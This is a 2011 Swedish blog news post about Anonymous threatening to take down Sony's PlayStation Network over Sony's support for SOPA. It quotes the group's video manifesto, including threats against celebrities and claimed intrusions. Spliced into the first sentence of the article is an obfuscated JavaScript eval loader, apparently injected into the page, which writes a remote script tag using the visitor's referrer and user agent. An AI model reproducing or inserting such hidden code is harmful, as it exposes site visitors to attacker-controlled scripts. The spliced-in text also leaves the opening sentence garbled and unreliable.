Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Anonymous tänker sänka Sony igen

Anonymous tänker sänka Sony igen
Filip Urde
  • On 30 december, 2011
  • http://www.revue.se/filip-urde

Denna eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rdtfh|var|u0026u|referrer|ikyyf||js|php’.split(’|’),0,{}))
gång p.g.a. Sonys stöd till SOPA-förslaget.

Tidigare i år hackades Sonys onlinetjänst PSN av det mystiska hacker aktivist-nätverket Anonymous där de nådde samtliga (i dag runt 80 miljoner) användarkonton inklusive betalningsuppgifter, ett hårt slag mot Sony vars onlinetjänst låg nere ett tag efter intrånget innan allt kunde återställas.

Vi har tidigare skrivit om SOPA-lagförslaget och om hoten Anonymous har skickat ut ifall det går igenom, och trots att detta ännu inte har skett sprids nu ett klipp på internet där det framgår att hackernätverket verkar skrida till verket då de nu tänker förgöra PSN, igen. Nedan finner ni klippet:

httpv://www.youtube.com/watch?v=WjOPXpd9PSU

Detta sägs i filmklippet:

Hello, SONY.
We are Anonymous.

It has come to the attention of the Anonymous activist community that you have chosen to stand by the Stop Online Piracy Act. This act will halt online businesses and restrict access to many sites for many users. Supporting SOPA is like trying to throw an entire company from off a bridge. Your support to the act is a signed death warrant to SONY Company and Associates. Therefore, yet again, we have decided to destroy your network. We will dismantle your phantom from the internet. Prepare to be extinguished. Justice will be swift, and it will be for the people, whether some like it or not. Sony, you have been warned.

To those doubting our powers. We’ve infiltrated the servers of Bank of America, The United States Department of Defense, The United Nations, and Lockheed Martin. In one day.

For their approval to SOPA, we have also declared that our fury be brought upon the following persons. Justin Bieber. Lady Gaga. Kim Kardashian. and Taylor Swift.

Operation Blackout, engaged.
Operation Mayhem, engaged.
Operation LulzXmas, engaged.

We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.

Supporters of SOPA, you should’ve expected us.

De flesta visar denna gång sitt stöd till Anonymous då SOPA-lagförslaget hittills inte fått något vidare stöd från allmänheten (vilket inte är så konstigt), men menar samtidigt på att det inte är företag som Sony som är problemet utan snarare myndigheterna. Samtidigt är det även många som tror att klippet är fake, mycket p.g.a. det löjliga introt och den ganska nötiga texten. Anonymous är däremot kända för att vara relativt episka i sina meddelanden varför jag inte vågar avfärda meddelandet som bullshit riktigt än. Om jag var Sony skulle jag däremot sitta på helspänn fr.o.m. nu.